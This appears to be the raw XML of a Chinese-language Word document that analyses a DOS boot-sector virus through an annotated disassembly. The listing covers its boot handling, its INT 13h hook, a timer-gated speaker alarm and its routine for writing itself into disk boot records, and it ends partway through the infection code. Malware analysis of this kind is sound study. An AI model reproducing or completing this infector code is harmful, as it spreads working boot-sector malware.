        <w:t>2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088 33C0          XOR     AX,AX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</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AX</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>清零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08A 8EC0          MOV     ES,AX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</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ES</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>指向</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0000h</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>段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08C CD13          INT     13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复位启动盘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08E 0E            PUSH    CS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</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>DS</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>指向病毒常驻段</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>9F80h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8F 1F            POP     DS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；判断感染盘号是否软盘？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90 803E0B0000    CMP     BYTE PTR [000B],00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095 7424          JZ      00BB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软盘启动跳转</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>9F80:00BB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；以下程序为硬盘启动的处理情形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097 BEAE01        MOV     SI,01AE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</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>DS:SI</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>为分区表搜索指针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09A 83C610        ADD     SI,+10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</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>DS:SI</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>指向下一个分区表项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；判断是否激活分区？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9D 803C80        CMP     BYTE PTR [SI],80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0A0 75F8          JNZ     009A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非激活分区，跳转</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>9F80:009A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；以下为激活分区处理程序段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0A2 8B14          MOV     DX,[SI]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取引导记录物理驱动器号与面号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0A4 8B4C02        MOV     CX,[SI+02]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取引导记录柱面与扇区号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0A7 BB007C        MOV     BX,7C00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缓冲区地址</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ES:BX</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0000:7C00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0AA B80102        MOV     AX,0201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读取</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>扇区数据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0AD CD13          INT     13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读磁盘扇区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0AF 72D7          JB      0088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读盘失败，跳转</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>9F80:0088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；读盘成功，设置接过控制权的程序的段地址为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>07C0h</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，偏移量默认为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0000h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B1 2E            CS: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B2 C7064801C007  MOV     WORD PTR [0148],07C0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0B8 EB7B          JMP     0135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跳转</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>9F80:0135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；空闲代码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BA 90            NOP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；以下程序为软盘启动的处理情形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lastRenderedPageBreak/>
        <w:t>9F80:00BB B280          MOV     DL,80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BD E8A900        CALL    0169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C0 BF1800        MOV     DI,0018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C3 8B45F9        MOV     AX,[DI-07]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C6 B90400        MOV     CX,0004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C9 D3E8          SHR     AX,CL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CB 8BE8          MOV     BP,AX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CD 8B45FE        MOV     AX,[DI-02]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D0 D1E0          SHL     AX,1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D2 40            INC     AX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D3 03E8          ADD     BP,AX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D5 F635          DIV     BYTE PTR [DI]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D7 8ACC          MOV     CL,AH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D9 FEC1          INC     CL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DB 33D2          XOR     DX,DX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DD 8AF0          MOV     DH,AL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DF BB0005        MOV     BX,0500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E2 B80102        MOV     AX,0201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E5 CD13          INT     13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E7 72F9          JB      00E2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E9 8BC5          MOV     AX,BP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EB BE3400        MOV     SI,0034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EE B707          MOV     BH,07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F0 F635          DIV     BYTE PTR [DI]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F2 33C9          XOR     CX,CX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F4 86E1          XCHG    AH,CL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F6 2BF1          SUB     SI,CX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F8 F67502        DIV     BYTE PTR [DI+02]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FB 8BD0          MOV     DX,AX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FD 86D5          XCHG    DL,CH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FF 8A05          MOV     AL,[DI]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01 2AC1          SUB     AL,CL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03 FEC1          INC     CL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05 B402          MOV     AH,02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07 50            PUSH    AX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08 CD13          INT     13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0A 58            POP     AX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0B 72F8          JB      0105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0D B101          MOV     CL,01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0F 02F8          ADD     BH,AL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11 02F8          ADD     BH,AL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13 8B05          MOV     AX,[DI]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15 FEC6          INC     DH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17 3A7502        CMP     DH,[DI+02]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lastRenderedPageBreak/>
        <w:t>9F80:011A 7204          JB      0120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1C B600          MOV     DH,00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1E FEC5          INC     CH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20 2BF0          SUB     SI,AX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22 73E1          JNB     0105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24 03C6          ADD     AX,SI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26 B402          MOV     AH,02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28 CD13          INT     13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2A 8A6DFD        MOV     CH,[DI-03]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2D 8BDD          MOV     BX,BP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2F C70648017000  MOV     WORD PTR [0148],0070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；引导程序读取成功后的公共处理程序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135 33C0          XOR     AX,AX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</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AX</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>清零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137 A20B00        MOV     [000B],AL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以后只感染软盘，形成病毒传播载体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13A 8ED8          MOV     DS,AX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</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>DS</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>指向</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0000h</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>段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13C B052          MOV     AL,52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</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AX</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>为盗用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>INT 13h</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>入口偏移</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0052h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13E A34C00        MOV     [004C],AX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修改</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>INT 13h</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>入口为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>9F80:0052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141 8C0E4E00      MOV     [004E],CS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为病毒程序触发挂上了弦</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D66C3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145 EA00007000    JMP     0070:0000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由引导程序继续启动操作系统</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F35590" w:rsidRDefault="00F35590" w:rsidP="00F35590">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>四、盗用中断分析</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F35590" w:rsidRDefault="00F35590" w:rsidP="00F35590"/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052 1E            PUSH    DS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保存</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>INT 13h</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>调用参数</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>DS</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AX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53 50            PUSH    AX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054 F6C2F0        TEST    DL,F0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判断是否对硬盘作操作？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057 7528          JNZ     0081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是对硬盘做操作，则跳转</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0081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；以下程序是对软盘作操作的处理过程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059 D0EC          SHR     AH,1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判断对磁盘的操作是否读、写操作？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5B FECC          DEC     AH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05D 7522          JNZ     0081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不读、写磁盘跳转</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0081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05F 33C0          XOR     AX,AX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</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AX</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>清零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061 8ED8          MOV     DS,AX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</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>DS</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>指向</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0000h</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>段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063 A16C04        MOV     AX,[046C]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取实时时钟低字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066 8AC4          MOV     AL,AH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取实时时钟低字的高字节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68 2E            CS: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069 2A060300      SUB     AL,[0003]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与上次保存的高字节作差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06D 3C02          CMP     AL,02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判断时差是否大于约</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>30</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>秒？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06F 7210          JB      0081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时差小于约</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>30</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>秒，跳转</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0081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71 2E            CS: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072 88260300      MOV     [0003],AH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保存当前高字节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076 3D0200        CMP     AX,0002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比较（当前高字节</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>时差）的值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079 7303          JNB     007E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大于等于</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0002h</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>则跳转</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>007E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07B E8CC00        CALL    014A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启动病毒表现模块，发警报音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07E E8E800        CALL    0169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启动病毒感染模块，感染磁盘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lastRenderedPageBreak/>
        <w:t>；对不同磁盘的公共处理程序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081 58            POP     AX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恢复</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>INT 13h</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>调用参数</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>DS</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AX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82 1F            POP     DS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83 2E            CS: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084 FF2E0700      JMP     FAR [0007]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完成正常</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>INT 13h</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>调用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F35590" w:rsidRDefault="00F35590" w:rsidP="00F35590"/>
    <w:p w:rsidR="00F35590" w:rsidRDefault="00F35590" w:rsidP="00F35590">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>五、辅助模块分析</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F35590" w:rsidRDefault="00F35590" w:rsidP="00F35590"/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 xml:space="preserve">5.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>辅助模块</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>014A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4A BBFFFF        MOV     BX,FFFF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4D B0B6          MOV     AL,B6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4F E643          OUT     43,AL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51 89D8          MOV     AX,BX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53 E642          OUT     42,AL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55 88E0          MOV     AL,AH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57 E642          OUT     42,AL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59 E461          IN      AL,61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5B 0C03          OR      AL,03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5D E661          OUT     61,AL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5F 4B            DEC     BX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60 B96400        MOV     CX,0064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63 E2FE          LOOP    0163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65 EBEA          JMP     0151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67 5B            POP     BX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168 C3            RET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函数运行结束</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F35590" w:rsidRPr="00F92F46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 xml:space="preserve">5.2 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>辅助模块</w:t>
      </w:r>
      <w:r w:rsidR="00F92F46">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0169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169 53            PUSH    BX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保存现场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6A 51            PUSH    CX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6B 52            PUSH    DX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6C 06            PUSH    ES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6D 56            PUSH    SI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6E 57            PUSH    DI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16F 0E            PUSH    CS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</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>DS</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>指向病毒常驻段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70 1F            POP     DS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171 0E            PUSH    CS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</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ES</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>指向病毒常驻段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72 07            POP     ES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173 BB0002        MOV     BX,0200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感染专用缓冲区</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>9F80:0200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176 B90100        MOV     CX,0001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</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>柱面</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>扇区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179 32F6          XOR     DH,DH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</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>面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17B B80102        MOV     AX,0201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读</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>个扇区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17E 9C            PUSHF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保存当前标志寄存器的值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17F FF1E0700      CALL    FAR [0007]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完成正常</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>INT 13h</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>调用，读盘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183 7222          JB      01A7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读盘失败，跳转</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>01A7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lastRenderedPageBreak/>
        <w:t>；以下为感染正常主引导记录或引导记录扇区的过程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；</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">5.2.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>设置跳转指令，用于越过</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>BPB</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>及病毒数据区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85 C707EB1C      MOV     WORD PTR [BX],1CEB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；</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">5.2.2 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>保存感染硬盘号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189 80FA80        CMP     DL,80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判断感染磁盘是否硬盘？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18C 7504          JNZ     0192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非硬盘，跳转</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0192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18E 88160B02      MOV     [020B],DL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是硬盘，写入磁盘号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；</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">5.2.3 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>植入病毒代码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192 FC            CLD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地址沿递增方向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193 B9A001        MOV     CX,01A0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植入代码长度为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>01A0h</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
